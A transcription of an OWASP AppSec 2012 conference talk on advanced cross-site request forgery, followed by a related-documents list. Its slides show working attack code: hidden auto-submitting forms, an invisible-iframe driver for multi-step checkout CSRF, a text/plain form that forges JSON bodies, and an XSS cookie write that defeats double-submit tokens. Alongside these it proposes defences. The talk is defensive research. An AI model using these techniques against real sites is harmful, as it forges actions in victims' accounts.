Advanced CSRF and Stateless at OWASP AppSec Research 2012
|
|
- Pamela Sanders
- 6 years ago
- Views:
Transcription
1 Advanced CSRF and Stateless at OWASP AppSec Research 2012
2 Frontend developer at Svenska Handelsbanken Researcher in application security Co-leader OWASP johnwilander.com (music) johnwilander.se (papers etc)
3 Some Quick CSRF Basics
4 Cross-Site Request Forgery Request Forgery Cross-Site
5 Cross-Site Request Forgery Request Forgery Cross-Site Phishing
6 What s on your mind? POST What s on your mind? POST
7 What s on your mind? I love OWASP! POST What s on your mind? POST
8 What s on your mind? I love OWASP! POST What s on your mind? POST John: I love OWASP!
9 What s on your mind? POST What s on your mind? POST
10 What s on your mind? POST What s on your mind? I hate OWASP! POST
11 What s on your mind? POST What s on your mind? I hate OWASP! POST
12 What s on your mind? John: I hate OWASP! POST What s on your mind? I hate OWASP! POST
13 What s on your mind? John: I hate OWASP! POST What s on your mind? <form id="target" method="post" action=" <input type="text" value="i hate OWASP!" name="oneliner"/> <input type="submit" value="post"/> </form> <script type="text/javascript"> $(document).ready(function() { $('#form').submit(); }); </script>
14 What s on your mind? John: I hate OWASP! <form id="target" method="post" action=" <input type="text" value="i hate OWASP!" name="oneliner"/> <input type="submit" value="post"/> </form> POST What s on your mind? <script> $(document).ready(function() { $('#target').submit(); }); </script>
15 Multi-Step, Semi-Blind CSRF
16 What about several steps? Step 1 Step 2 Step 3 State built up i steps, server roundtrip in-between
17 Step 1 Step 2 Step 3 Forged request to last step will miss the previous
18 Can we forge timed GETs and POSTs in a deterministic, non-blind way? Step 1 Step 2 Step
19 csrfmultidriver.html invisible iframe csrfmulti0.html
20 csrfmultidriver.html invisible iframe target0.html invisible iframe csrfmulti1.html Wait
21 csrfmultidriver.html invisible iframe invisible iframe invisible iframe target0.html target1.html csrfmulti2.html Wait
22 csrfmultidriver.html invisible iframe invisible iframe invisible iframe invisible iframe target0.html target1.html target2.html csrfmulti3.html Wait
23 csrfmultidriver.html invisible iframe invisible iframe invisible iframe invisible iframe target0.html target1.html target2.html target3.html
24 Let's look at An iframed CSRF Get
25 Invisible iframe for timed GET <!DOCTYPE html> <html> <head> <script> var IFRAME_ID = "0", GET_SRC = " </script> <script src="../iframegetter.js"></script> </head> <body onload="iframe_getter.onload()"> Extra easy to CSRF since it's done with HTTP GET. </body> </html> csrfmulti0.ht
26 The iframed page configures which URL to CSRF against via a JavaScript- <!DOCTYPE html> <html> variable. <head> <script> var IFRAME_ID = "0", GET_SRC = " </script> <script src="../iframegetter.js"></script> </head> <body onload="iframe_getter.onload()"> Extra easy to CSRF since it's done with HTTP GET. </body> </html> csrfmulti0.ht
27 <!DOCTYPE html> <html> <head> <script> When var IFRAME_ID the iframe's = "0", GET_SRC DOM = is done " </script> loading IFRAME_GETTER.onload() is <script called. src="../iframegetter.js"></script> </head> <body onload="iframe_getter.onload()"> Extra easy to CSRF since it's done with HTTP GET. </body> </html> csrfmulti0.ht
28 <!DOCTYPE html> <html> <head> <script> var IFRAME_ID = "0", GET_SRC = Let's look at " </script> iframegetter.js <script src="../iframegetter.js"></script> </head> <body onload="iframe_getter.onload()"> Extra easy to CSRF since it's done with HTTP GET. </body> </html> csrfmulti0.ht
29 var IFRAME_GETTER = {}; IFRAME_GETTER.haveGotten = false; IFRAME_GETTER.reportAndGet = function() { var imgelement; if(parent!= undefined) { parent.postmessage(iframe_id, " } if(!iframe_getter.havegotten) { imgelement = document.createelement("img"); imgelement.setattribute("src", GET_SRC); imgelement.setattribute("height", "0"); imgelement.setattribute("width", "0"); imgelement.setattribute("onerror", "javascript:clearinterval(iframe_getter.intervalid)"); document.body.appendchild(imgelement); IFRAME_GETTER.haveGotten = true; } }; IFRAME_GETTER.onLoad = function() { IFRAME_GETTER.intervalId = setinterval(iframe_getter.reportandget, 1000); }; iframegetter.js
30 var IFRAME_GETTER = {}; IFRAME_GETTER.haveGotten = false; IFRAME_GETTER.reportAndGet = function() { var imgelement; if(parent!= undefined) { parent.postmessage(iframe_id, " } if(!iframe_getter.havegotten) { imgelement = document.createelement("img"); imgelement.setattribute("src", GET_SRC); imgelement.setattribute("height", "0"); IFRAME_GETTER.onload() imgelement.setattribute("width", makes "0"); sure that imgelement.setattribute("onerror", the iframe reports back to the "javascript:clearinterval(iframe_getter.intervalid)"); main document.body.appendchild(imgelement); page once every second. IFRAME_GETTER.haveGotten = true; A so called heart beat function. } }; IFRAME_GETTER.onLoad = function() { IFRAME_GETTER.intervalId = setinterval(iframe_getter.reportandget, 1000); }; iframegetter.js
31 var IFRAME_GETTER = {}; IFRAME_GETTER.haveGotten = false; IFRAME_GETTER.reportAndGet = function() { var imgelement; if(parent!= undefined) { parent.postmessage(iframe_id, " } if(!iframe_getter.havegotten) { In practice, the heart beats are imgelement = document.createelement("img"); delivered imgelement.setattribute("src", via postmessage GET_SRC); between imgelement.setattribute("height", "0"); the imgelement.setattribute("width", iframe and the main page. "0"); imgelement.setattribute("onerror", "javascript:clearinterval(iframe_getter.intervalid)"); document.body.appendchild(imgelement); IFRAME_GETTER.haveGotten = true; } }; IFRAME_GETTER.onLoad = function() { IFRAME_GETTER.intervalId = setinterval(iframe_getter.reportandget, 1000); }; iframegetter.js
32 var IFRAME_GETTER = {}; IFRAME_GETTER.haveGotten = false; IFRAME_GETTER.reportAndGet = function() { var imgelement; if(parent!= undefined) { The parent.postmessage(iframe_id, GET CSRF is executed with an " <img src="vulnerable URL"> } if(!iframe_getter.havegotten) { imgelement = document.createelement("img"); imgelement.setattribute("src", GET_SRC); imgelement.setattribute("height", "0"); imgelement.setattribute("width", "0"); imgelement.setattribute("onerror", "javascript:clearinterval(iframe_getter.intervalid)"); document.body.appendchild(imgelement); IFRAME_GETTER.haveGotten = true; } }; IFRAME_GETTER.onLoad = function() { IFRAME_GETTER.intervalId = setinterval(iframe_getter.reportandget, 1000); }; iframegetter.js
33 The onerror event will fire var IFRAME_GETTER = {}; IFRAME_GETTER.haveGotten since the vulnerable = false; URL does IFRAME_GETTER.reportAndGet = function() { var imgelement; not respond with an image. We if(parent!= undefined) { use that event to stop the parent.postmessage(iframe_id, heart beat function. " No heart } if(!iframe_getter.havegotten) beat means the main { page imgelement knows = this document.createelement("img"); step is done and imgelement.setattribute("src", GET_SRC); imgelement.setattribute("height", can continue opening the "0"); next imgelement.setattribute("width", iframe. "0"); imgelement.setattribute("onerror", "javascript:clearinterval(iframe_getter.intervalid)"); document.body.appendchild(imgelement); IFRAME_GETTER.haveGotten = true; } }; IFRAME_GETTER.onLoad = function() { IFRAME_GETTER.intervalId = setinterval(iframe_getter.reportandget, 1000); }; iframegetter.js
34 Let's look at An iframed CSRF Post
35 <!DOCTYPE html> <html> <head> POST <script> var IFRAME_ID = "1"; </script> <script src="../iframeposter.js"></script> </head> <body onload="iframe_poster.onload()"> Invisible iframe for timed <form id="target" method="post" action=" style="visibility:hidden"> <input type="text" name="goodsid" value="95a0b76bde6b1c76e05e28595fdf5813" /> <input type="text" name="numberofitems" value="1" /> <input type="text" name="country" value="swe" /> <input type="text" name="proceed" value="to checkout" /> </form> </body> </html> csrfmulti1.ht
36 <!DOCTYPE html> <html> <head> <script> var IFRAME_ID = "1"; </script> <script The src="../iframeposter.js"></script> vulnerable URL can be </head> found in the form to be <body onload="iframe_poster.onload()"> posted. <form id="target" method="post" action=" style="visibility:hidden"> <input type="text" name="goodsid" value="95a0b76bde6b1c76e05e28595fdf5813" /> <input type="text" name="numberofitems" value="1" /> <input type="text" name="country" value="swe" /> <input type="text" name="proceed" value="to checkout" /> </form> </body> </html> csrfmulti1.ht
37 <!DOCTYPE html> <html> <head> <script> var IFRAME_ID = "1"; </script> <script src="../iframeposter.js"></script> </head> called. <body onload="iframe_poster.onload()"> When the iframe's DOM is done loading IFRAME_POSTER.onload() is <form id="target" method="post" action=" style="visibility:hidden"> <input type="text" name="goodsid" value="95a0b76bde6b1c76e05e28595fdf5813" /> <input type="text" name="numberofitems" value="1" /> <input type="text" name="country" value="swe" /> <input type="text" name="proceed" value="to checkout" /> </form> </body> </html> csrfmulti1.ht
38 <!DOCTYPE html> <html> <head> <script> Let's look at iframeposter.js var IFRAME_ID = "1"; </script> <script src="../iframeposter.js"></script> </head> <body onload="iframe_poster.onload()"> <form id="target" method="post" action=" style="visibility:hidden"> <input type="text" name="goodsid" value="95a0b76bde6b1c76e05e28595fdf5813" /> <input type="text" name="numberofitems" value="1" /> <input type="text" name="country" value="swe" /> <input type="text" name="proceed" value="to checkout" /> </form> </body> </html> csrfmulti1.ht
39 var IFRAME_POSTER = {}; IFRAME_POSTER.havePosted = false; IFRAME_POSTER.reportAndPost = function() { if(parent!= undefined) { parent.postmessage(iframe_id, " } if(!iframe_poster.haveposted) { document.forms['target'].submit(); IFRAME_POSTER.havePosted = true; } }; IFRAME_POSTER.onLoad = function() { setinterval(iframe_poster.reportandpost, 1000); }; iframeposter
40 var IFRAME_POSTER = {}; IFRAME_POSTER.havePosted = false; IFRAME_POSTER.reportAndPost = function() { if(parent!= undefined) { parent.postmessage(iframe_id, " } if(!iframe_poster.haveposted) IFRAME_POSTER.onload() { makes sure the document.forms['target'].submit(); iframe reports back to the main IFRAME_POSTER.havePosted = true; } page once every second. Again, a }; heart beat function. IFRAME_POSTER.onLoad = function() { setinterval(iframe_poster.reportandpost, 1000); }; iframeposter
41 var IFRAME_POSTER = {}; IFRAME_POSTER.havePosted = false; IFRAME_POSTER.reportAndPost = function() { if(parent!= undefined) { parent.postmessage(iframe_id, " } The heart beats stop automatically if(!iframe_poster.haveposted) when the POST is done since { the document.forms['target'].submit(); iframe IFRAME_POSTER.havePosted is loaded with the = true; response } from the web server that got the }; POST. IFRAME_POSTER.onLoad = function() { setinterval(iframe_poster.reportandpost, 1000); }; iframeposter
42 The main page configures the order of the CSRF steps, opens iframes and var CSRF = function(){ var hideiframes = true, frames = [ {id: 0, hasposted: "no", hasopenediframe: false, src: 'csrfmulti0.html'},{id: 1, hasposted: "no", hasopenediframe: false, src: 'csrfmulti1.html'} ], appendiframe = function(frame) { var domnode = '<iframe src="' + frame.src + '" height="600" width="400"' + (hideiframes? 'style="visibility: hidden"' : '') + '></iframe>'; $("body").append(domnode); }; csrfmultidriver.ht
43 return { checkiframes : function() { var frame; for (var i = 0; i < frames.length; i++) { frame = frames[i]; if (!frame.hasopenediframe) { iframe appendiframe(frame); frame.hasopenediframe = true; break; // Only open one iframe at the time } else if(frame.hasposted == "no") { frame.hasposted = "maybe"; break; // iframe not done posting, wait } else if(frame.hasposted == "maybe") { frame.hasposted = "yes"; break; // iframe not done posting, wait } else if (frame.hasposted == "yes") { continue; // Time to allow for the next iframe to open } }, } listens on heart beats to time every receivemessage : function(event) { if (event.origin == " { CSRF.frames[parseInt(event.data)].hasPosted = "no"; // Still on CSRF page so POST not done yet } } csrfmultidriver.ht
44 Demo Multi-Step, Semi-Blind CSRF against amazon.com which has protection against this. The intention is to show how you can test your own sites.
45 There used to be a protection in web 1.5
46 Forced Browsing wizard-style Shipment info Payment info $ Next Buy!
47 Forced Browsing wizard-style Shipment info Payment info $ Token Next Buy!
48 Forced Browsing wizard-style Shipment info Payment info $ Re-Auth Next Buy!
49 Forced Browsing wizard-style Token 1 Token 2 Token 3
50 Forced Browsing wizard-style Token 1 Token 2 Token 3 State built up i steps, server roundtrip in-between
51 Forced Browsing wizard-style Token 1 Token 2 Token 3 Couldn t forge request to last step without a valid token
52 But in RIAs...
53 RIA & client-side state { purchase : {} }
54 RIA & client-side state { purchase : { items : [{}] } }
55 RIA & client-side state { purchase : { items : [{},{}] } }
56 RIA & client-side state { purchase : { items : [{},{}], shipment : {} } }
57 RIA & client-side state { purchase : { items : [{},{}], shipment : {}, payment : {} } }
58 RIA & client-side state { purchase : { items : [{},{}], shipment : {}, payment : {} } }
59 Can an attacker forge such a JSON structure?
60 CSRF Against RESTful Services
61 CSRF possible? { purchase : { items : [{},{}], shipment : {}, payment : {} } }
62 <form id="target" method="post" action=" 8444/ws/oneliners"> <input type="text" name= value="" /> <input type="submit" value="go" /> </form>
63 <form id="target" method="post" action=" 8444/ws/oneliners" style="visibility:hidden"> <input type="text" name= value="" /> <input type="submit" value="go" /> </form>
64 <form id="target" method="post" action=" 8444/ws/oneliners" style="visibility:hidden" enctype="text/plain"> <input type="text" name= value="" /> <input type="submit" value="go" /> </form>
65 <form id="target" method="post" action=" 8444/ws/oneliners" style="visibility:hidden" enctype="text/plain"> Forms produce a request body that looks like this: <input type="text" name= value="" /> thename=thevalue... and that s not valid JSON. <input type="submit" value="go" /> </form>
66 <form id="target" method="post" action=" 8444/ws/oneliners" style="visibility:hidden" enctype="text/plain"> <input type="text" name='{"id": 0, "nickname": "John", "oneliner": "I hate OWASP!", "timestamp": " "}//' value="dummy" /> <input type="submit" value="go" /> </form>
67 <form id="target" method="post" action=" 8444/ws/oneliners" style="visibility:hidden" Produces a request body that looks enctype="text/plain"> like this: <input type="text" {"id": 0, "nickname": name='{"id": "John","oneLiner": 0, "nickname": "John", "I "oneliner": hate OWASP!","timestamp": "I hate "timestamp": " "}//=dummy " "}//' value="dummy" />... and that is acceptable JSON! <input type="submit" value="go" /> </form>
68 <form id="target" method="post" action=" 8444/ws/oneliners" style="visibility:hidden" enctype="text/plain"> <input type="text" name='{"id": 0, "nickname": "John", "oneliner": "I hate OWASP!", "timestamp": " ", "paddingdummy": "' value='"}' /> <input type="submit" value="go" />
69 <form id="target" method="post" action=" 8444/ws/oneliners" style="visibility:hidden" Produces a request body that looks enctype="text/plain"> like this: <input type="text" {"id": 0, "nickname": name='{"id": "John","oneLiner": 0, "nickname": "John", "I "oneliner": hate OWASP!","timestamp": "I hate "timestamp": " ", " ", "paddingdummy": "' "="} value='"}' />... and that is JSON! <input type="submit" value="go" />
70 Demo CSRF POST then Demo CSRF + XSS The Browser Exploitation Framework
71 Important in your REST API Restrict HTTP method, e.g. POST Easier to do CSRF with GET Restrict to AJAX if applicable X-Requested-With:XMLHttpRequest Cross-domain AJAX prohibited by default Restrict media type(s), e.g. application/json HTML forms only allow URL encoded, multipart and text/plain
72 Double Submit (CSRF Protection)
73 Double Submit (CSRF protection) Anti-CSRF value as cookie and request parameter
74 Double Submit (CSRF protection) cookie request parameter Cannot read the anti-csrf cookie to include it as parameter
75 Double Submit (CSRF protection) Anti-CSRF cookie can be generated client-side => no server-side state
76 Demo Double Submit
77 Are We Fully Protected Now?
78 Are We Fully Protected Now? Of course not
79 The Other Subdomain Search Buy!
80 The Other Subdomain <script>alert('xss')</script> Search XSS OK Buy!
81 The Other Subdomain Buy! <script> $.cookie( "doublesubmittoken", "knownvalue", { path: "/", domain: ".1-liner.org" }); </script> Search
82 Demo Subdomain XSS Double Submit Bypass
83 I'm proposing some sort of Triple Submit CSRF Protection
84 Triple Submit (CSRF protection) Initial request of rich internet app
85 Triple Submit (CSRF protection) Random HttpOnly cookie Cookie value as JavaScript variable
86 Triple Submit (CSRF protection) Random HttpOnly cookie Cookie value as request parameter Stateful: Cookie name saved in server session Stateless: Server only accepts one such cookie (checks format)
87 The 3rd Submit The server sets an HttpOnly cookie with a random name and random value The server tells the client the value of the random cookie, not the name The client submits the value of the cookie as a request parameter
88 The 3rd Submit The server sets an httponly cookie esponse.setheader("set-cookie", randomname with a + random "=" + randomvalue name and random + "; HttpOnly; valuepath='/'; domain=.1-liner.org"); The server tells the client the name and value of the random cookie The Client submits the name and value of the cookie as a request parameter
89 The 3rd Submit The server sets an httponly cookie with a random name and random value script> ar ANTI_CSRF_TRIPLE The server tells the = <%= client randomvalue the name %>; /script> and value of the random cookie The Client submits the name and value of the cookie as a request parameter
90 The 3rd Submit Cookie value as parameter The cookie name The cookie value
91 My Demo System is Being Released as an OWASP title=owasp_1-liner owasp-1-liner
92
OWASP Top 10. from a developer s perspective. John Wilander, OWASP/Omegapoint, IBWAS 10
Top 10 from a developer s perspective John Wilander, /Omegapoint, IBWAS 10 John Wilander consultant at Omegapoint in Sweden Researcher in application security Co-leader Sweden Certified Java Programmer
More informationCommon Websites Security Issues. Ziv Perry
Common Websites Security Issues Ziv Perry About me Mitnick attack TCP splicing Sql injection Transitive trust XSS Denial of Service DNS Spoofing CSRF Source routing SYN flooding ICMP
More informationCross-Site Request Forgery in Cisco SG220 series
Cross-Site Request Forgery in Cisco SG220 series Security advisory 12/09/2016 Renaud Dubourguais Nicolas Collignon www.synacktiv.com 5 rue Sextius Michel 75015 Paris Vulnerability description The Cisco
More informationWeb basics: HTTP cookies
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh February 11, 2016 1 / 27 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the
More informationHow is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh March 30, 2015 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the server sends
More informationPenetration Test Report
Penetration Test Report Feb 12, 2018 Ethnio, Inc. 6121 W SUNSET BLVD LOS angeles, CA 90028 Tel (888) 879-7439 ETHN.io Summary This document contains the most recent pen test results from our third party
More informationCSC 482/582: Computer Security. Cross-Site Security
Cross-Site Security 8chan xss via html 5 storage ex http://arstechnica.com/security/2015/09/serious- imgur-bug-exploited-to-execute-worm-like-attack-on- 8chan-users/ Topics 1. Same Origin Policy 2. Credential
More informationRKN 2015 Application Layer Short Summary
RKN 2015 Application Layer Short Summary HTTP standard version now: 1.1 (former 1.0 HTTP /2.0 in draft form, already used HTTP Requests Headers and body counterpart: answer Safe methods (requests): GET,
More informationLecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422
Lecture 17 Browser Security Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422 Documents Browser's fundamental role is to display documents comprised
More informationWeb basics: HTTP cookies
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh November 20, 2017 1 / 32 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the
More informationWEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang
WEB SECURITY WORKSHOP TEXSAW 2014 Presented by Solomon Boyd and Jiayang Wang Introduction and Background Targets Web Applications Web Pages Databases Goals Steal data Gain access to system Bypass authentication
More informationCIS 4360 Secure Computer Systems XSS
CIS 4360 Secure Computer Systems XSS Professor Qiang Zeng Spring 2017 Some slides are adapted from the web pages by Kallin and Valbuena Previous Class Two important criteria to evaluate an Intrusion Detection
More informationJOE WIPING OUT CSRF
JOE ROZNER @JROZNER WIPING OUT CSRF IT S 2017 WHAT IS CSRF? 4 WHEN AN ATTACKER FORCES A VICTIM TO EXECUTE UNWANTED OR UNINTENTIONAL HTTP REQUESTS WHERE DOES CSRF COME FROM? 6 SAFE VS. UNSAFE Safe GET HEAD
More informationJOE WIPING OUT CSRF
JOE ROZNER @JROZNER WIPING OUT CSRF IT S 2017 WHAT IS CSRF? 4 WHEN AN ATTACKER FORCES A VICTIM TO EXECUTE UNWANTED OR UNINTENTIONAL HTTP REQUESTS WHERE DOES CSRF COME FROM? LET S TALK HTTP SAFE VS. UNSAFE
More informationWeb 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007
Web 2.0 and AJAX Security OWASP Montgomery August 21 st, 2007 Overview Introduction Definition of Web 2.0 Basics of AJAX Attack Vectors for AJAX Applications AJAX and Application Security Conclusions 1
More informationSecurity. CSC309 TA: Sukwon Oh
Security CSC309 TA: Sukwon Oh Outline SQL Injection NoSQL Injection (MongoDB) Same Origin Policy XSSI XSS CSRF (XSRF) SQL Injection What is SQLI? Malicious user input is injected into SQL statements and
More informationWriting Secure Chrome Apps and Extensions
Writing Secure Chrome Apps and Extensions Keeping your users safe Jorge Lucángeli Obes Software Engineer Keeping users safe A lot of work going into making browsers more secure What about users' data?
More informationLecture Overview. IN5290 Ethical Hacking
Lecture Overview IN5290 Ethical Hacking Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks Universitetet i Oslo Laszlo Erdödi How to use Burp
More informationLecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks
IN5290 Ethical Hacking Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks Universitetet i Oslo Laszlo Erdödi Lecture Overview How to use Burp
More informationWHY CSRF WORKS. Implicit authentication by Web browsers
WHY CSRF WORKS To explain the root causes of, and solutions to CSRF attacks, I need to share with you the two broad types of authentication mechanisms used by Web applications: 1. Implicit authentication
More informationCross Site Request Forgery
Cross Site Request Forgery VULNERABILITY OVERVIEW WHITE PAPER PUBLIC Version: 1.0 By: Acadion Security URL: http://www.acadion.nl/ Date: February 6, 2013 Address: Koornmarkt 46 2611 EH Delft Nederland
More informationMulti-Post XSRF Web App Exploitation, total pwnage
Multi-Post XSRF Web App Exploitation, total pwnage Adrien de Beaupré SANS ISC Handler Tester of pens Certified SANS Instructor Intru-Shun.ca Inc. SecTor 2015 Introduction Web application vulnerabilities.
More informationCSCD 303 Essential Computer Security Fall 2017
CSCD 303 Essential Computer Security Fall 2017 Lecture 18a XSS, SQL Injection and CRSF Reading: See links - End of Slides Overview Idea of XSS, CSRF and SQL injection is to violate the security of the
More informationNeat tricks to bypass CSRF-protection. Mikhail
Neat tricks to bypass CSRF-protection Mikhail Egorov @0ang3el About me AppSec Engineer @ Ingram Micro Cloud Bug hunter & Security researcher Conference speaker https://www.slideshare.net/0ang3el @0ang3el
More informationCSCD 303 Essential Computer Security Fall 2018
CSCD 303 Essential Computer Security Fall 2018 Lecture 17 XSS, SQL Injection and CRSF Reading: See links - End of Slides Overview Idea of XSS, CSRF and SQL injection is to violate security of Web Browser/Server
More informationSichere Software vom Java-Entwickler
Sichere Software vom Java-Entwickler Dominik Schadow Java Forum Stuttgart 05.07.2012 BASEL BERN LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR. HAMBURG MÜNCHEN STUTTGART WIEN We can no longer
More informationClient Side Injection on Web Applications
Client Side Injection on Web Applications Author: Milad Khoshdel Blog: https://blog.regux.com Email: miladkhoshdel@gmail.com 1 P a g e Contents INTRODUCTION... 3 HTML Injection Vulnerability... 4 How to
More informationInformation Security CS 526 Topic 8
Information Security CS 526 Topic 8 Web Security Part 1 1 Readings for This Lecture Wikipedia HTTP Cookie Same Origin Policy Cross Site Scripting Cross Site Request Forgery 2 Background Many sensitive
More informationAttacks Against Websites. Tom Chothia Computer Security, Lecture 11
Attacks Against Websites Tom Chothia Computer Security, Lecture 11 A typical web set up TLS Server HTTP GET cookie Client HTML HTTP file HTML PHP process Display PHP SQL Typical Web Setup HTTP website:
More informationContent Security Policy
About Tim Content Security Policy New Tools for Fighting XSS Pentester > 10 years Web Applications Network Security Products Exploit Research Founded Blindspot Security in 2014 Pentesting Developer Training
More informationlast time: command injection
Web Security 1 last time: command injection 2 placing user input in more complicated language SQL shell commands input accidentally treated as commands in language instead of single value (e.g. argument/string
More informationHacking Web Sites Cross Site Scripting
Hacking Web Sites Cross Site Scripting Emmanuel Benoist Spring Term 2018 Berner Fachhochschule Haute cole spcialise bernoise Berne University of Applied Sciences 1 Table of Contents Presentation Stored
More informationCSCE 813 Internet Security Case Study II: XSS
CSCE 813 Internet Security Case Study II: XSS Professor Lisa Luo Fall 2017 Outline Cross-site Scripting (XSS) Attacks Prevention 2 What is XSS? Cross-site scripting (XSS) is a code injection attack that
More informationAdvanced Web Technology 10) XSS, CSRF and SQL Injection
Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 1 Table of Contents Cross Site Request Forgery - CSRF Presentation
More informationInformation Security CS 526 Topic 11
Information Security CS 526 Topic 11 Web Security Part 1 1 Readings for This Lecture Wikipedia HTTP Cookie Same Origin Policy Cross Site Scripting Cross Site Request Forgery 2 Background Many sensitive
More informationBrowser code isolation
CS 155 Spring 2016 Browser code isolation John Mitchell Acknowledgments: Lecture slides are from the Computer Security course taught by Dan Boneh and John Mitchell at Stanford University. When slides are
More informationP2_L12 Web Security Page 1
P2_L12 Web Security Page 1 Reference: Computer Security by Stallings and Brown, Chapter (not specified) The web is an extension of our computing environment, because most of our daily tasks involve interaction
More informationWeb Security: Vulnerabilities & Attacks
Computer Security Course. Web Security: Vulnerabilities & Attacks Type 2 Type 1 Type 0 Three Types of XSS Type 2: Persistent or Stored The attack vector is stored at the server Type 1: Reflected The attack
More informationSurrogate Dependencies (in
Surrogate Dependencies (in NodeJS) @DinisCruz London, 29th Sep 2016 Me Developer for 25 years AppSec for 13 years Day jobs: Leader OWASP O2 Platform project Application Security Training JBI Training,
More informationOWASP Application Security Building and Breaking Applications
OWASP Application Security Building and Breaking Applications Welcome Rochester OWASP Chapter - Durkee Consulting, Inc. info@rd1.net OWASP: About US OWASP = Open Web Application Security Project Dedicated
More informationWEB SECURITY: XSS & CSRF
WEB SECURITY: XSS & CSRF CMSC 414 FEB 22 2018 Cross-Site Request Forgery (CSRF) URLs with side-effects http://bank.com/transfer.cgi?amt=9999&to=attacker GET requests should have no side-effects, but often
More informationSome Facts Web 2.0/Ajax Security
/publications/notes_and_slides Some Facts Web 2.0/Ajax Security Allen I. Holub Holub Associates allen@holub.com Hackers attack bugs. The more complex the system, the more bugs it will have. The entire
More informationWeb Security. advanced topics on SOP. Yan Huang. Credits: slides adapted from Stanford and Cornell Tech
Web Security advanced topics on SOP Yan Huang Credits: slides adapted from Stanford and Cornell Tech Same Origin Policy protocol://domain:port/path?params Same Origin Policy (SOP) for DOM: Origin A can
More informationAttacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14
Attacks Against Websites 3 The OWASP Top 10 Tom Chothia Computer Security, Lecture 14 OWASP top 10. The Open Web Application Security Project Open public effort to improve web security: Many useful documents.
More informationHTTP Security Headers Explained
HTTP Security Headers Explained Scott Sauber Slides at scottsauber.com scottsauber Audience Anyone with a website Agenda What are HTTP Security Headers? Why do they matter? HSTS, XFO, XSS, CSP, CTO, RH,
More informationThe PKI Lie. The OWASP Foundation Attacking Certificate Based Authentication. OWASP & WASC AppSec 2007 Conference
The PKI Lie Attacking Certificate Based Authentication Ofer Maor CTO, Hacktics OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Copyright 2007 - The OWASP Foundation Permission is granted to copy,
More informationWeb Security IV: Cross-Site Attacks
1 Web Security IV: Cross-Site Attacks Chengyu Song Slides modified from Dawn Song 2 Administrivia Lab3 New terminator: http://www.cs.ucr.edu/~csong/sec/17/l/new_terminator Bonus for solving the old one
More informationOWASP Top David Caissy OWASP Los Angeles Chapter July 2017
OWASP Top 10-2017 David Caissy OWASP Los Angeles Chapter July 2017 About Me David Caissy Web App Penetration Tester Former Java Application Architect IT Security Trainer: Developers Penetration Testers
More informationIs Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection
Is Browsing Safe? Web Browser Security Charlie Reis Guest Lecture - CSE 490K - 5/24/2007 Send Spam Search Results Change Address? Install Malware Web Mail Movie Rentals 2 Browser Security Model Pages are
More informationCSRF in the Modern Age
CSRF in the Modern Age Sidestepping the CORS Standard Tanner Prynn @tannerprynn In This Talk The State of CSRF The CORS Standard How Not To Prevent CSRF The Fundamentals of HTTP Without cookies: With cookies:
More informationCNIT 129S: Securing Web Applications. Ch 12: Attacking Users: Cross-Site Scripting (XSS) Part 2
CNIT 129S: Securing Web Applications Ch 12: Attacking Users: Cross-Site Scripting (XSS) Part 2 Finding and Exploiting XSS Vunerabilities Basic Approach Inject this string into every parameter on every
More informationMWR InfoSecurity Security Advisory. DotNetNuke Cross Site Request Forgery Vulnerability Contents
Contents MWR InfoSecurity Security Advisory DotNetNuke Cross Site Request Forgery Vulnerability 2010-06-14 2010-06-14 Page 1 of 7 Contents Contents 1 Detailed Vulnerability Description... 4 1.1 Introduction...
More informationFIREFOX MENU REFERENCE This menu reference is available in a prettier format at
FIREFOX MENU REFERENCE This menu reference is available in a prettier format at http://support.mozilla.com/en-us/kb/menu+reference FILE New Window New Tab Open Location Open File Close (Window) Close Tab
More informationCSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis
CSE361 Web Security Attacks against the client-side of web applications Nick Nikiforakis nick@cs.stonybrook.edu Despite the same origin policy Many things can go wrong at the client-side of a web application
More informationCross-Site Request Forgery: The Sleeping Giant. Jeremiah Grossman Founder and CTO, WhiteHat Security
Cross-Site Request Forgery: The Sleeping Giant Jeremiah Grossman Founder and CTO, WhiteHat Security Cross-Site Request Forgeries (CSRF) 1. Session Riding 2. Client-Side Trojans 3. Confused Deputy 4. Web
More informationWeb Application Security. Philippe Bogaerts
Web Application Security Philippe Bogaerts OWASP TOP 10 3 Aim of the OWASP Top 10 educate developers, designers, architects and organizations about the consequences of the most common web application security
More informationAvoiding Web Application Flaws In Embedded Devices. Jake Edge LWN.net URL for slides:
Avoiding Web Application Flaws In Embedded Devices Jake Edge LWN.net jake@lwn.net URL for slides: http://lwn.net/talks/elce2008 Overview Examples embedded devices gone bad Brief introduction to HTTP Authentication
More informationAttacking the Application OWASP. The OWASP Foundation. Dave Ferguson, CISSP Security Consultant FishNet Security.
Attacking the Application Dave Ferguson, CISSP Security Consultant FishNet Security Copyright The Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the
More informationYour Scripts in My Page: What Could Possibly Go Wrong? Sebastian Lekies / Ben Stock Martin Johns
